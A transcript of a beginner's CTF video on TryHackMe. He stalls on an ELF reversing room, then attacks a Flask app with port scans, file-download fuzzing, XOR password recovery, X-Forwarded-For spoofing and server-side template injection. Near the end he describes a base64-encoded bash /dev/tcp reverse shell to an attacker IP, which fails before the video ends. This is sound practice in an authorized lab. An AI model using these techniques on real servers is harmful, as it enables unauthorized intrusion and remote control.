Hey, good afternoon, everyone. My name is Brandon, and today I will be doing my day 8. I believe it's day 8, maybe day 9. I think it's day 8, though. I'll be doing my day 8 Try Hack Me challenge. So, if you guys don't know yet, I trade every day. One Try Hack Me room, one new skill, always ethical, and by 30, I'll be a pro ethical hacker. So, let's get started. We're going to do my Try Hack Me room for today. Yesterday, I learned a little bit about ELF, which is executable line format, I believe, or executable Linux format. You know what? Let me quickly. So, yeah, we're looking at reversing ELF. And this involved, string, trying to read out the text, and then we went all the way down into Ghidra, where we saw the base code to it. So this started because I attempted to do a room called Reversing Void, which provided an ELF executable, and I had absolutely no idea how to progress in that room. So now that we know this, let's head back to that room and see if we could progress a little further now that we understand how to actually open up the ELF executable. So, I just need to figure out how do I even find the room that was just in. You know what? I think I can go to try Hackman and go to recents. Perfect. And it's called Void Execution. And let's start this machine. And we could download the files. I might not have to download the files. I believe I'm going to turn my VPN on so we can access the room. Let me go to. I don't need to go downloads. Let's just do this. Downloads. Boom. Alright. And I'm going to type my password in. I guess I'm not typing my password in. Alright, now, there we go. Let's take a look. LS try hack me. And believe it was void execution. Let's see what we found. So these were my 3 executables. So let's open up Ghidra and see what we got. I mean, that's what we gotta look for here. I really like the Ghidra logo. I think that's really cool. I guess we could just close that. So I had a couple projects going here. So I guess we could just open this project. Or maybe it's import file. Can I just import the file? I can. All right. We're going to go to computer file. Way too far. Try hack me. Void execution. And I guess we're gonna do this. And we're gonna analyze this to see. I have no idea what we're looking to see, but maybe it'll be obvious. So, is it debugger? Because I'm not seeing anything at the moment. I did open up, oh, there we go. We gotta analyze it. And we're gonna analyze. And this is what I'm looking for. Okay, so what is going on here? I'm not even seeing. Send to void. Like, where's my functions? What is this? File. Import. Void exec. Like, I don't under really. Let's import file. Let's get this and see what we could find from here because where is my functions? It's not showing me anything. Okay, I don't really like that it's not showing me my functions. Debug console maybe? Connections? Is that what it is? Do I need connections? Go. Path. don't like that. Like how? Okay. So this is my void exec. Let me see if I can make that any bigger so I can actually read it. Um, Send to void execution. Common. Forbidden. Main. Main. What? Where is the main function? I lib start main. Next, search all. Main. Um, I'm gonna need a bit of help here because I'm not too sure what's walk through void exec, because this is, I don't know if this is set up correctly. It seems like I don't have this set up correctly. So this is looking for something called void. Search all. Which obviously is not true. I saw the word void several times on here. STD out forbidden. I That's a little frustrating. It's not showing up on the side. Maybe I gotta make a new project. Like I don't know what's going on here. No. Sure. I'm gonna just close this. Close, because I don't think this opened properly. Because where was my void? I just don't understand where all the functions were. That's cool. Destination file already exists. Let's just go to. It's not even letting me change. I would like to go to a different one. I mean, just delete it. I mean, void exactly. We'll just keep things moving here. We'll just do that. All right. Let's analyze this. Analyze. Okay. Acquired library. So main. Send to void execution. So what? I mean, void exec. Hello. Voided. Okay, so segmentation fault, huh? That was out of bounds. Is this a memory manipulation room? Let's. Okay. So, is this returning memory positions? Okay. There's a forbidden function, which don't really understand what it does. There's a setup function. There's a frame dummy. Register TM clones. Frame dummy. I don't like that it's not showing me any functions on the left, but I suppose I'll just analyze it. Process entry. Thunk no return void exit. Thunk int m protect. What does this do? I disassemble? Would that do anything? Can't disassemble uninitialized memory. Okay. Don't even know what I was trying to do, to be honest. Read M set. Is that setting the memory? Thunk void M map. I don't disassemble, and I can't disassemble. So this is actually the function that's being pointed to in the walkthrough. So memory allocation creates an creates an executable memory region at address 0x. How does it know that? Using mmap. So did he like follow this? I don't watches console. I don't really. Oh my goodness! There we go. Why couldn't I find that before? What is this? Why is this even here? I don't. This is stupid. Get this out of here. This should be right here. I like this over here. Okay, functions. Now I can read it. Oh my goodness. Start. So init. Let's look at init first. Fini to global init. STD call init. EVPPKC. What? What? Oh, I think that's a parameter. Times CTX. I wish I knew what language this was written in. Because I think I need to study whatever language this is. This is not. I don't understand how it's. The logic behind it. Location to apply to relocation. So I think this is going to involve some sort of memory manipulation here. Forbidden. I wonder if I can find the main function. So this is the main function, which was what I was struggling to find for a second here. And no, let's go back to main. Is this really the main function though? Main function setup. I feel like I'm missing something. Start. Export imports. Obviously exports. Main. This might still be a little too over the top for me. So I think maybe I should just do another elf room. Because what am I looking at? There's just not enough. Yeah, I just don't have enough information to be able to decipher this room yet. Like for example, like why are these unassigned? Okay, let me just check. Main. Main. Maybe I should do functions. I think that's what I'm actually supposed to look for. So preview main. Is this? Okay. Next. Next. Search all. Um. Search all. Undefined main. Like, what is an undefined main? And then we just have main, which takes me right back there. Lib. All right. I'm too confused. Yeah. So what we're gonna do is we're gonna close out of Ghidra, or what? I don't. Yeah, that's Ghidra. And we're gonna close out of this. We're gonna terminate this room because I just do not know how to proceed with that one. It happens. I mean, what am I gonna do? Let's do this. Let's try to see if we can Go to practice. Let's just see what we can find. I have done Looking Glass before. That looks like half of it. A sequel to the Wonderland Challenge Room. Um, Captcha Apocalypse. Tripoon Me, a collection of exploit development challenges to practice the basic techniques of binary exploitation. Reform of compromise. Hackfinity. New York flankies. The London Bridge. Definitely a lot of kind of looking for more of a game one today. Friday overtime. Stealth. Break me. We need your help. Backtrack. Come on, there has to be more of a game type one. Boogeyman. Like, that's what I'm talking about. Like, now if I can find Boogeyman 1, that'd be great. Let's just keep going here. I'm sure we'll find something. C2. Super secret tip. You better be a matrix. You know what? Let's do it. Why not? Why not? Well, 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 you're here, and I'm glad to see that. Your task is simple. Well, not really. I mean, it's kind of, but anyways, I was debugging my work and forgot about some probably harmful code, and sadly, I lost access to my machine. Could you find my valuable information for me? Don't forget to enjoy the journey while you're at it. And it looks like we got 2 flags to find, so nothing crazy. And then we got a thank you. Well, here we are again. I'd like to thank you for exploiting my machine and finding my valuable flags. I hope you enjoyed this challenge and have learned something new. This is my first room on Try Hack Me, and I'm glad that I made it, and hopefully you'll see more rooms like this one soon. Okay, so let's just get into it. We're gonna get out of this. We're gonna make a super secret. I'm not putting any underscores just to make this easy. I don't want to. Alright, now we're gonna ping once this thing boots up. It said do 5 minutes, so I might pause the video just to let it run some time so it boots up everything. You know what I'm gonna do? I'm gonna pause the video real quick and just let it boot up. It said it wanted 5 minutes, so I'm gonna give it 5 minutes. We'll be back. Alright, I am back. I gave it about a minute. We're just gonna do basic enumeration. I don't think I'll be not finding anything. So let's do a basic enumeration real quick. We're just gonna hit it with the classic, just a small end map, just see what it finds real quick off of. Alright, I'm gonna do a I'm gonna actually do it with a T5 on it, just to quick scan. I just see what it finds. And I have this on max speed, so it's really gonna be a quick. If it finds anything, afterwards I feel like it'll be enough time has passed, and I'll run a more in-depth scan. Now, obviously, if this was a real environment, me throwing out a dash T5 would be terrible. It'd be so easily seen. It's such an aggressive scan. Definitely would have recommended if you're trying to be stealthy. But this is a try hack me room. They're not gonna ban me for scanning the ports too quick. I might get timed out though. Hopefully I don't get timed out. Yeah. So let's see. We found port 20,032. Why not? Let's just go to it. So 10.201.6.10, and what was that? 20,023? Is that what the port was? 32. Close. No, but no connection. So 201.6.10. I'm gonna do a real scan this time. Actually, you know what? I'm just gonna do an SV because I want to identify what this is. Port 20,032 at the IP address of that, and let's see what we find. I mean, still can't detect the port. Wow. Okay. Let's do a normal scan. Let's do default scripts. Let's identify service versions. I'm gonna force it. I'm gonna print this out to an nmap file. We're gonna do all the ports. We're gonna hit this and we're gonna verbose it. I'm gonna type it completely wrong. We're gonna add a capital C so that way I choose the right thing. And we're gonna turn verbose on, and this is probably gonna take a little bit, so I'll resume the video once nmap reports its results back. Alright, I'm back. So I ran a couple of scans here, and I figured I'd make a quick note here. It's I think running the -T5 actually screwed me because now I can't find any other port besides SSH because I'm guessing it's probably timed out. So I'm gonna keep trying here to get the other port. I know there's two ports. I checked just to make sure. But yeah, that's why you never do the -T5 because I just screwed myself by doing it. Um, okay, yeah. So look at that. Look at that. Came right up. Perfect. So I want to see if I could do an SV on this port. At IP. So I want to see if I can identify the version or anything about this port. I think the room also. I think it was a combination of this room took a long time to load too. So okay, work Zug. Let's see what we can find out about that. Um, yeah, you know what? I might as well even go to it, which was 10.6.10. I think that was it. Nice. Known vulnerabilities in the WorkZug package. Allocation of resources. Directory traversal. Python version prior to 3.1.1. And this said 3.1.3.11. Prior? So this one might not. RCE. So we're actually looking for anything lower than 3.11. 3.11. Go back to all versions. Because I'm looking for 3.11. 3. What was this? 3.11. This is 3.1. 3.11? I might even pull up Metasploit, see if I could find anything. I'm gonna actually pull up Metasploit just to. Can I do this search exploit? Work solid HTTP 2.3.4. I probably should put that in quotations. Whoops. Really? Really? But 0. I'm gonna just look at. Why is this? No, is it this? What am I doing wrong? MSF Metasploit console. Am I MSF console? What am I doing wrong right now? Metasploit command. MSF console. MSF console. What is going on? Metasploit? Like, what's going on? Why does it say command not found? I. So I just need to reset the. What is going on? Why won't this work? Of course, it's always something. I'm gonna just look through this page, just see what I find. Obviously, I think I could probably go buster this. Let me go buster it. So we can enumerate the directories, see what we can find on the directories. Word list. We have a word list here called seclists, and then inside here it's I don't know if it's discovery, and then web content. Then we just do big.text, and that should enumerate that. So we'll see if we can find anything from the GoBuster, if there's any other directories that we're not aware of. So wrap the rest of the page in another container to center all the content. Okay. Carousel. Lots of comments for the place so the pages load faster. Just to make our place home, don't actually copy the next line. Viewport hack for Windows 8 bug. Internet Explorer 10 viewport hack. I think this might just be a fix. Okay, that's just something with TSS, CSS. I don't think that's anything of relevance. How's this game going? Cloud, okay. Okay, I guess. Download. What is this? What am I supposed to do with this information? Do I have to type it? My password. What is this? What is the point of this? The requested URL. Templates. What is this? Name download. I'm just gonna. Okay. Burp suited, I mean. So this dialog box is not letting me type more than, I don't know, what is that? 8 characters? 7? That's 7. Um, so I'm just gonna burp suite it so I can put as many characters as I want when I send the request. So I mean, all right, where's burp suite? Is it still loading? Where is it? How am I not seeing it? Ah, there we go. Okay. And we're gonna open up burp suite. And then once this opens up, we're going to just send this command. Right, we're gonna go into proxy. We're gonna turn this on. I could set this browser as um, interceptable, but I'm just gonna use their browser. Okay. Now I want to turn Burp Suite on, and we're gonna put and download it. then we're going to change this to what I want. So I wanted to say, get this closed out. Let's just do templates. Let's see if it works. Templates.py. Now, obviously, I want to go for the passwords, but I'm gonna send this to repeater actually. So let's do that. Let's send it to repeater. Send. So that worked. Okay, good. So I'm gonna change that. Secret? Can I do secret? Download equals secret.text. Send. Did I not type that right? Download. And this is secret.text. Send. So the templates one worked. My passwords.text. Send. I wonder if I have to like put this in quotation marks or something. Or maybe it's just like that. I don't exactly know how to type it. My app.apk. Send. All right, let me look at this templates.py. What's going on there? Why is that the only one that works? I'm gonna just forward that request so I could download it. I don't know if there's a way to download it from my end, but forward, keep. Obviously we're gonna open this thing up. So we're gonna go to. Is this all it is? Okay, so I didn't realize it was just literally giving me what the output was. So we'll go back to repeater. Now let's go to image 1425.nef. I don't even know what that could possibly. Of course, it actually gave me something. I'm gonna forward that to actually here, but I can't. How do I get this? Back? No. I don't know how to get the actual link. Download. Like it's giving me the response, but I don't want the response. I want to save item. No. That could have been right, but I'm not really sure. So send. It's working. Okay, maybe I'll just redo the request. I'm just gonna redo the request because I don't. Okay, we're gonna drop it, and we're going to just download again, and we're gonna change it to image 14.nef. And I don't know what nef even is. I don't even know if I can open this. I've never opened a nef file before. Okay, web. We'll figure out how to open that. I'm just gonna download all this stuff. And I'm gonna drop this. We're gonna refresh again and download. Nice. We're gonna call video move forward. Great. We're gonna try to do it again. My app.apk. Did it work? It did. Great. So we're gonna keep that. We're gonna drop that. Download. I don't know if we're gonna get this one. This is the fun one here. I doubt I'm gonna get this one because how am I gonna? I don't think this is typed right. Forward. Didn't think so. Back. Drop. Drop. we can forward this. Whoops, I didn't mean to stop it. But okay, so let's grab all this stuff and move it over to this folder. And move templates. Templates. We're gonna put that here. We're gonna move downloads. We're gonna get this image to here. What else did I get? I got that movie. Downloads, vid. And we're gonna move that here. So what else? Is that it? Okay. So we got these three. And what in the world is this video gonna be? Okay, so if I do strings template, that just tells me that. How in the world do I read a nef file? Dark table. Alright. Always fun to download dark table here. Alright, we're downloading dark table so we can view this image with a NEF extension. Very fun. Okay, can I view it now? What am I typing? ls dark table. Wow, what am I looking at here? What in the world? Oh, goodness. Import. Add to library. Home. Super secret. Let's take a look at this. So, I wonder if this is going to be... okay, so sometimes you can hide passwords in images. I'm wondering if I need to do an, is it EXIF? No, EXIF tool? It's built into, Kali. Let me pull up my notes, see if I can remember how to extract, picture contents. SQL, no. Surprised I don't have good notes for that. But let's see. Okay, what am I doing here? I'm just trying to EXIF an image. It totally might not even be something of relevance. Let me just go back to try hack me. Let me see if I can watch that video just see if it's anything of use. Maybe he's a cool guy. Alright, he's not a cool guy. EXIF a video? I'm pretty sure I could do it too. Let me try it. EXIF tool vid. There's another command. I just don't remember what it was. Because you could definitely hide things into one of these files. Okay, let me try strings. Let's see if is it all just junk. This totally could just be junk. Right. Yeah, none of this is looking like base 64 or anything. Yeah, I think it's just junk. Okay, so I'm gonna try the same thing with vid, just in case, right? You know, just in case there's high. I don't think. I don't think it's anything of use. Okay. Stag hide. I don't know if I really want to use it. I don't think. It's not even a JPEG. So there was another directory we saw there besides um, this cloud, and it was what, debugger? Maybe it wasn't debugger. What was it? What? Nope. I'm surprised I didn't run GoBuster in a different. Oh, debug. Um, what is this supposed to do? And there's a password. Um, this guy's fuzzing it. How is he fuzzing it? Oh, that's how he's putting as one of the. Okay, okay. So this guy's fuzzing it. So what he did was that, which was clever. I should have thought about that, but instead of doing this, cloud. Last uploaded 7. 1, 2, 3, 4, 5, 6, 7. Okay. There's actually another one in here that we can't see. I didn't even think about that. So what he did was he did a fuzz. So he is fuzzing this URL, which is 10.6.10 with the cloud, right? And this is obviously a post request. And this is what he's changing, because there's a download field, and he's doing fuzz. Now, how did he know that? Okay, I'm just gonna do what he did. I don't know how he found that it was .py file just off the top, but whatever. So we're just gonna use my checklist discovery, and we're literally just running the same. He actually just used common though. And we're just ignoring 404. And we're gonna wait for this to load. So a little fuzz here. Might as well, while this is doing that, we might as well make an example for this. This is called secret tips or something. Secret tips. So we fuzzing. We're doing a little fuzz. I'm gonna just copy this command so I remember it. And where is it? Where did I just open that? Oh, here we go. And just so we could fuzz that entry here. So we're gonna wait for this entry to load. Hopefully it finds something. And oh, templates. Templates was found and found source. So source was found, which was actually what this guy was suggesting for us to get to. So, do I still have this open? Great. And I wonder if I could just type it. Source.py. Nope, I can't. Doesn't matter though. .py. Let's forward that. Let's get it. Keep. And let's take a look at what we just got. We're gonna drop that. And let's move that from the downloads. We'll just source. We'll bring it right here. And I guess nano would probably be fine. Alright, so now we got a full script here. Okay. So we're starting off with an import password string open secret super secret IP.text, which I'm guessing is probably in this directory. So I'm just gonna type that. What was it? SuperSecretTip.text. So that's great. That's great. SuperSecretTip.text. Okay. Forward. Let's see what we get. Did I get it? Oh, I'm not in the... Yes, we did get it. Okay. So let's... I don't know if I should read this. I'll come back. Let me bring it over. Super... Bring over here. Cat, what is it? Okay, so this is... I just need to convert this into whatever... I think it's hex. Hexadecimal to... I don't know. Would it be decimal? I don't know if this would be decimal. Okay. So let's try octal. Let's try hex. Hex number has digits range from... Dude, why am I not... Translate. I know these represent ASCII characters. Is this binary? I'm about to pull out ChatGPT because I think ChatGPT could probably decipher it. Percent control nodes. That's a hard password. That's a hard password. Okay, let's just read that other thing here, because now that we know that's control nodes. Nano source .py. The app secret key is control nodes. Illegal characters. And illegal are these random symbols. Route cloud. So on the cloud directory, there's cloud.html, source.py. Should I get the cloud.html? I don't see what the point is. Then you get the source, which is just this. Else, cloud download, user underscore password. This is the debug website. User underscore password equals request.args get password. If not user password or not debug, render template, Render blah blah blah. Encrypted password equals string debug password dot get underscore encrypted user underscore password. Password. Encrypted pass. There appears to be another website called. If not, I'm gonna try to go to that website. Debug result. It looks like it's going to prevent me, but I mean, why not? Debug result. Omega Ford. Everything made in home. We don't like intruders. Okay, that's what I thought. So if not IP dot check IP return abort everything made. Session dot get password. Okay. Let's look at this again. And I can't scroll down on this, it looks like, right? I don't think there's anything at the bottom. Oh, nope, there is. Don't know why that didn't work. Template slash debug result testing. Don't forget to remove for security reasons. Great. Templates. Let me try that. Templates dot debug result dot html, right? Did I type that wrong? I think I typed it wrong. Templates slash debug result dot html. Templates slash debug result dot html. Okay. For some reason, it doesn't appear to be working, but I mean, maybe I'm just not at that right point yet. So let me read this again. Source.py dot text super secret IP dot text. Got that. Cloud.html source app. I'm just gonna go to cloud.html, even though I know what it is. Okay. I guess I don't need to put the HTML. Templates, debug result. Is that what it was? Cloud. Okay. No, no, no. Source.py. I'll be honest, I'm a little stuck here. I don't really understand this. So it says go for debug password.py, but I don't see that on here at all. Hmm. This is pretty crazy. We can go to this point one by one. First, we need to download the ip.py. But how did it know that ip.py exists? This file imports two other. Oh, is there an import function? Where's the import? Import from and debug password. Okay. Duh. I should have looked at the top. Okay, so we got these two imports. So let's run burp suite. We're going to turn intercept back on. And what is it? IP.py? I wonder if I could just literally just run that. Forward? No, that didn't work. Drop. And if I could forward that. What am I looking for? IP. Do I do this from debug though? Debug password. Now, before I do this, I'm just gonna run this through repeater just to see if it gives me a 200. If you guys don't know, a 200 is successful. 404 means not found. With the point 4. I don't know how I would have known this part right here. This part's throwing me off. Return poon dot. I don't know how I would have known that part right there. That part's kind of throwing me off. Forward. Keep. Why did I do it like that? I'm going to make a note. Then I guess I do the same thing for IP. I do. X dash forwarded 4. That's probably how I get into debug that other web page we found. Interesting. Okay. So we're going to copy this. Proxy. We're going to drop this. Download. And we're going to send this request over. We're going to forward it. I'm going to download this. Alright. Fun. Alright, we're going to get out of here. Let's move those stuff over. I think that was what IP. And we're going to bring that here. LS downloads. And we're going to bring. What was the other one I downloaded here? I thought I downloaded two. Debug. There it is. Alright. So we got debug password and we got IP.py. Let's see what debug password is. Return poon.xor. What is poon? What is this pulling it from? An encrypt password. Password BAHAM. I don't know if that's a cipher. Okay. What was the other one? IP.py. Host IP equals localhost. Define check IP. Rec return get list x dash forwarded for host IP except remote address equals a host. Do I just have to put this x dash forwarded for? Is that what? Okay. So this is where things get a little a little interesting. So, super secret and debug, right? They go hand in hand, and the XOR is AHAM. So, okay, I'm gonna convert this to hex because I think that would be the easiest way to do this. Like, I'm gonna convert this to hex. So, um, copy, and we're just gonna put hex, and so let's see if that works. Okay, so now we got this hex, right? I'm gonna copy this whole thing just so we have it in my notes. Alright, so now we got this string, and now I think we gotta incorporate exit this. So it's XOR, it's XOR, which is a form of cipher. I'm gonna close this and we're gonna go XOR cipher. Decode maybe? I don't know if it's this. And I suppose I could take out the that decrypt. Okay. Is that my password for the debugger? So what was this address? 10.201.610? Nice. Debug? Is that what it was? So what do I do? Do I just put the password in? Um, I'm literally just gonna try this. Debug statement executed. Who am I? So I guess the purpose of this is to look for SSTI. I'm gonna pull up an article so we can learn what SSTI, server-side template injection. Web applications commonly use server-side templating technologies to generate dynamic HTML responses. Server-side template injection vulnerabilities, SSTI, occur when user input is embedded in a template in an unsafe manner and results in remote code execution on the server. Oh, okay. Any features that support advanced user-supplied markup may be vulnerable to SSTI, including wiki pages, reviews, marketing applications, CMS systems, etc. Some template engines employ various mechanisms to protect against SSTI. The following example is an excerpt from the Extreme Vulnerable Web Application Project. So we got a function. The call user is vulnerable to SST. The name parameter is fetched from HTTP GET and executed by the server. Oh. So you could common template expression examples. I'm gonna just try it because why not? So I saved the password, right? The password, I'm gonna just keep that in there. What did I just have open? this. Identify. Does this work? I don't even know how to tell if that worked or not. Oh. So I'm gonna just try this. Put the password in. Boom. Oh, wrong password. Whoops. 3 times 3, and then what do I have saved? Let's grab this, and then we go to debug results. That other page we found. Okay, then we have to use the X-4 with Burp Suite. So, am I still in Burp Suite? I need to open it up, don't I? Open browser. You can drop these. So 10.216.10 777 debug result, right? And since we're doing a get, we have to add my X forward. So let me just pull up. Was it debug password? No. Templates? No, it was source. It was source. Debug. Where did I just see it? I saw X-forward 4, and that was the way to get into it. Maybe while I was burp suiting, I saw it. Right, it wasn't cat, right? Cat IP pie? It was. Okay, so that's what I'm doing. Okay, so let's put it right here, and we're doing an X forwarded 4. And then I think it's a okay. We're literally just putting the IP we saw. So no, I gotta open it. Only real debuggers can access this page. How did it know? Let me read that file again. It doesn't even have a. Hmm. Let me do a repeater this time. Bang. Right? Let me do this again. Send this to repeater. Send. 401 unauthorized. So, since we know it, we need the X forwarded 4. We're putting localhost in there. I spelled that so badly. 4. Did I still get the 401? Is it forwarded? I got a 200. Only real debuggers could access this page. How does it know still? Host is that X dash forwarded 4. I mean, maybe I don't think this would make a difference. Could you imagine if it did? Alright, we're going debug result. Hmm. Hmm. Do I need to like send it to the debugger first? Let me send it to the whoops. Let me send it to the debugger and see what happens. Three. Maybe that's all it is. I think I just have to send it to the debugger maybe. And then Burp Suite. Send. Only real debuggers. Bro, I debug for a living. What's going on? Nah, I'm kidding. Um, I don't. How else would it know? I should. Oh, of course, of course. Sure. Okay, I gotta grab this cookie ID. I gotta grab the cookie ID, of course. Because how else would it know? Um, okay, proxy. So I guess we could just drop this. Um, refresh. No, I just need to go debug actually. We go here. We could drop this. We're gonna forward this one, and we're gonna do 3 times 3. We're gonna put the password in. Keep opening the wrong thing, and we add the session ID. Right. Come on. Oh, forward. Duh. I needed the results though. Oh, I should have sent it to repeater. Okay, let me do it again. 3. Let's debug. Send this to the repeater. That should be a third tab. Excellent. Cookie session is what I need. So let this send. And this I need to put here. Send. Does that work? Debugging. Okay. Um, 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 um. Now we gotta go back to 10.216.10 777 debug result. I gotta craft this whole thing again. Is this the cookie session? That. Let me grab this proxy. Put that there. Let's forward that. 9. Is this not a terminal? I thought that was a terminal. So I was really hoping that'd be a terminal. I wonder if I could possibly. Well, this is obviously executing on server side. So what if I do a reverse shell by having it like open up a listener? I remember it said I do have to use base 64 because in this is specifically illegal characters. So I'm gonna base 64 it. So let me just make a reverse shell. So let's get out of here. Let me just pull up my hacking resources. Let's see, shell, reverse shell, cheat sheet. I'm looking for a bash. Bash. Okay, we're doing this one. So Linux, where is it? Why is my Linux tab? Okay, great. Okay, so this is basically what I'm looking. I'm just gonna put on my other screen, but that's what I'm looking at. Bash I at dev TCP. This is gonna be me. Alright, do 4, 5, 6, 7 at 1. We could base 64. How do I base 64 this? Base 64. Okay. What in the world? The payload has to be URL encoded. We decode our reverse shell and pipe it into bash. Wow. Okay. So this actually turns insane how they do this. So now it's like crafting the payload to be executed to get us reverse shell. So let me just make a note. Okay. So this is the payload request. I'm gonna just put mine in this. Okay. So class.mro one.subclasses, I guess that's just how it executes from this end. This is obviously my payload. Then it's decoding it. Then I guess it's looking for bash. Or it's spawning shell at this point. So we're going to do this. So let's go into... do I have this in repeater still? Debug? Is this debug? If I do this... The way this guy did it, he did it right after. Just like that. That's how he did it. And did I not end my quotation? Echo. It should have ended at bash. It does. But I don't know why it didn't. Like, why is this on a whole separate line? Whatever, I guess. Send? Is that? Oh, he's doing percent. What if I just put it straight right there, like that? I mean, proxy. Let's debug. That looks better. And then I send this to repeater. Let's send. Okay. That. Did I put the password in? What am I doing? That's not even the password. That's the command. This is the password. This is actually what I need. I need to drop these requests. Drop. Oh, jeez. Forward. We're gonna put the password in. We're gonna grab my command all over again. Wherever it was. Where'd I have it? Right here. We're gonna send that. Let's debug. Proxy. We're gonna send this to the repeater. Right. Then we're on 200? Okay, we got 200. I'm gonna just turn on my reverse shell just in case it connects while I'm doing this. Now we go here to debug result. So debug result, debug result, debug result. Here, okay. And do I still have the cookie for this? I do. So let's do that. Let's grab this cookie. Send. Did this not send? I'm going to forward this request. Forward. And now I'm going to refresh this. Let me actually go to debug result. We're going to refresh that. Proxy. And obviously we're going to have to put my stuff back. Was this the cookie? No, it's not the cookie. Was that the cookie actually? Is that the cookie? That's definitely the cookie. We're going to put this cookie back. And we're going to add my thing back, which is X forwarded for one. Actually, we're going to send this to repeater. Let me send it to repeater just before I mess it up and, it just turns into a whole disaster. 200. I got 200 off of it. Let me just see if, nope, nothing. Okay. And then 5. I got this cookie right. Let me make sure I got this cookie. That's the one I need. Okay. Then, now that that's good, let's forward it. Everything made at home. We don't like intruders. Why do I keep getting 9? This is difficult. Let me try it again. Forward. Okay. Do this again. Let me just put X forwarded for, nope, 127, oh, that one. Forward. Either the service overloaded or there's an error in the application. Forward? X. What am I doing here? Forwarded for 127. This is the cookie session. Forward. And it's still giving me a 9. I don't understand why. So let me put this back in like that and get this password like this. I think that's fine. I'm going to copy this cookie session, copy, forward, debugger, refresh. We're going to change this cookie session ID to match that. And then we're going to add the classic, is it dash? I keep forgetting if it's a dash or a colon. Forwarded 4. Alright, let's see if that works. The server will encounter a terminal was unable to complete your request. Either a service overloaded or there's an error in the application. Come on. How did I define 4567? Okay. Bash dash I dev TCP 10.6.56.192 4567 0 colon at 1. And then base 64. That gave me the base 64 value. How much time? Ooh, I'm at 1:30. Okay, here's what we're gonna do, guys. I'm running time here. I wasn't expecting it to be this long. We'll follow up. We definitely got a good start on this. I think next video will be tomorrow, of course, and I think we'll continue with this room. I have a lot of the information already, so hopefully the next part of tomorrow's episode is I'm just gonna capture reverse shell and we'll be privilege escalating on the machine. So it's gonna be straight up just penetration for tomorrow's episode. Alright, thanks. Bye.